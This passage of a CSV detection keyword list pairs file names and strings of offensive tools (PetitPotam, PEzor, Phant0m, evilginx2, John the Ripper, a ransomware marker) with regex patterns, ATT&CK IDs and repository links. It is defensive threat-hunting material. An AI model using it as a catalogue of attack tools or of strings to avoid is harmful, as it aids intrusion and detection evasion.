TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*PetitPotam.py*",".{0,1000}PetitPotam\.py.{0,1000}","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","10","10","1713","280","2024-02-19T23:49:20Z","2021-07-18T18:19:54Z" "*PetitPotam.sln*",".{0,1000}PetitPotam\.sln.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*PetitPotam.sln*",".{0,1000}PetitPotam\.sln.{0,1000}","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","10","10","1713","280","2024-02-19T23:49:20Z","2021-07-18T18:19:54Z" "*PetitPotam.vcxproj*",".{0,1000}PetitPotam\.vcxproj.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" 
"*PetitPotam:main*",".{0,1000}PetitPotam\:main.{0,1000}","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","0","N/A","10","10","1713","280","2024-02-19T23:49:20Z","2021-07-18T18:19:54Z" "*petitpotam_check*",".{0,1000}petitpotam_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*PetitPotamModified.exe*",".{0,1000}PetitPotamModified\.exe.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","10","5","497","89","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" "*PetitPotato 3 cmd*",".{0,1000}PetitPotato\s3\scmd.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*PetitPotato.Build.CppClean.log,*",".{0,1000}PetitPotato\.Build\.CppClean\.log,.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege 
Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*PetitPotato.exe*",".{0,1000}PetitPotato\.exe.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","1","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*PetitPotato.lastbuildstate*",".{0,1000}PetitPotato\.lastbuildstate.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*PEzor generated Beacon Object File*",".{0,1000}PEzor\sgenerated\sBeacon\sObject\sFile.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - 
LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*PEzor!! v*",".{0,1000}PEzor!!\sv.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*PEzor*/Inject.c*",".{0,1000}PEzor.{0,1000}\/Inject\.c.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*Pezor*inject.hpp*",".{0,1000}Pezor.{0,1000}inject\.hpp.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - 
T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*PEzor.sh -*",".{0,1000}PEzor\.sh\s\-.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik 
Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*PEzor.sh *.bin*",".{0,1000}PEzor\.sh\s.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*PEzor.sh -32*",".{0,1000}PEzor\.sh\s\-32.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*PEzor.sh -64*",".{0,1000}PEzor\.sh\s\-64.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - 
T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*PEzor/*/bof.cpp*",".{0,1000}PEzor\/.{0,1000}\/bof\.cpp.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*PEzor/*syscalls.hpp*",".{0,1000}PEzor\/.{0,1000}syscalls\.hpp.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 
T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*PEzor\inject.cpp*",".{0,1000}PEzor\\inject\.cpp.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*pfsense*reverse_root_shell_csrf/*",".{0,1000}pfsense.{0,1000}reverse_root_shell_csrf\/.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*pfx2john.py*",".{0,1000}pfx2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*PGh0bWw+DQoJPGhlYWQ+DQoJCTx0aXRsZT5JbmMuIFJhbnNvbXdhcmU8*",".{0,1000}PGh0bWw\+DQoJPGhlYWQ\+DQoJCTx0aXRsZT5JbmMuIFJhbnNvbXdhcmU8.{0,1000}","offensive_tool_keyword","Inc","Inc ransomware","T1486 - T1490","TA0040","N/A","N/A","Ransomware","https://github.com/rivitna/Malware","1","0","#yara","10","3","261","38","2024-05-01T19:21:20Z","2021-07-28T21:00:52Z" "*pgpdisk2john.py*",".{0,1000}pgpdisk2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*pgpsda2john.py*",".{0,1000}pgpsda2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*pgpwde2john.py*",".{0,1000}pgpwde2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" 
"*ph4nt0mbyt3/Darkside*",".{0,1000}ph4nt0mbyt3\/Darkside.{0,1000}","offensive_tool_keyword","Darkside","C# AV/EDR Killer using less-known driver (BYOVD)","T1547.006 - T1055 - T1562.001","TA0005 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/ph4nt0mbyt3/Darkside","1","1","N/A","10","2","117","24","2023-11-10T16:01:21Z","2023-11-10T15:34:20Z" "*ph4ntonn/Stowaway*",".{0,1000}ph4ntonn\/Stowaway.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","1","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*Phant0m scm 1*",".{0,1000}Phant0m\sscm\s1.{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","0","N/A","N/A","10","1725","297","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" "*Phant0m scm 2*",".{0,1000}Phant0m\sscm\s2.{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","0","N/A","N/A","10","1725","297","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" "*Phant0m wmi*",".{0,1000}Phant0m\swmi.{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","0","N/A","N/A","10","1725","297","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" "*phant0m.cna*",".{0,1000}phant0m\.cna.{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","10","1725","297","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" "*Phant0m_cobaltstrike*",".{0,1000}Phant0m_cobaltstrike.{0,1000}","offensive_tool_keyword","cobaltstrike","Aggressor script to integrate Phant0m with 
Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/p292/Phant0m_cobaltstrike","1","1","N/A","10","10","27","13","2017-06-08T06:42:18Z","2017-06-08T06:39:07Z" "*phant0m-exe.*",".{0,1000}phant0m\-exe\..{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","10","1725","297","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" "*Phant0m-master.zip*",".{0,1000}Phant0m\-master\.zip.{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","10","1725","297","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" "*phant0m-rdll*",".{0,1000}phant0m\-rdll.{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","10","1725","297","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" 
"*phantom_thread * shc *",".{0,1000}phantom_thread\s.{0,1000}\sshc\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*PhantomService.csproj*",".{0,1000}PhantomService\.csproj.{0,1000}","offensive_tool_keyword","PhantomService","Searches for and removes non-ASCII services that can't be easily removed by built-in Windows tools","T1050.005 - T1055.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/PhantomService","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*PhantomService.exe*",".{0,1000}PhantomService\.exe.{0,1000}","offensive_tool_keyword","PhantomService","Searches for and removes non-ASCII services that can't be easily removed by built-in Windows tools","T1050.005 - T1055.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/PhantomService","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*phillips321/adaudit*",".{0,1000}phillips321\/adaudit.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*phish_test.go*",".{0,1000}phish_test\.go.{0,1000}","offensive_tool_keyword","gophish","Open-Source Phishing Toolkit","T1566-001 - 
T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/gophish/gophish","1","1","N/A","10","10","10656","1973","2024-04-15T08:29:57Z","2013-11-18T23:26:43Z" "*phish_windows_credentials.rb*",".{0,1000}phish_windows_credentials\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Phish-Creds.ps1*",".{0,1000}Phish\-Creds\.ps1.{0,1000}","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2434","474","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" "*phishDomain = phishDomain +*",".{0,1000}phishDomain\s\=\sphishDomain\s\+.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor 
authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","N/A","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*phishery*",".{0,1000}phishery.{0,1000}","offensive_tool_keyword","phishery","Phishery is a Simple SSL Enabled HTTP server with the primary purpose of phishing credentials via Basic Authentication. Phishery also provides the ability easily to inject the URL into a .docx Word document.","T1566.001 - T1210 - T1565 - T1564.001","TA0002 - TA0007 - TA0010","N/A","N/A","Phishing","https://github.com/ryhanson/phishery","1","1","N/A","N/A","10","960","210","2017-09-11T15:42:10Z","2016-09-25T02:19:24Z" "*phishing-HTML-linter.*",".{0,1000}phishing\-HTML\-linter\..{0,1000}","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2434","474","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" "*phishlets *",".{0,1000}phishlets\s.{0,1000}","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","0","N/A","N/A","10","1475","287","2024-05-01T19:00:30Z","2022-09-07T02:47:43Z" "*phising_attack.py*",".{0,1000}phising_attack\.py.{0,1000}","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","42797","4691","2024-04-30T19:30:47Z","2020-04-11T09:21:31Z" "*phkbamefinggmakgklpkljjmgibohnba*",".{0,1000}phkbamefinggmakgklpkljjmgibohnba.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - 
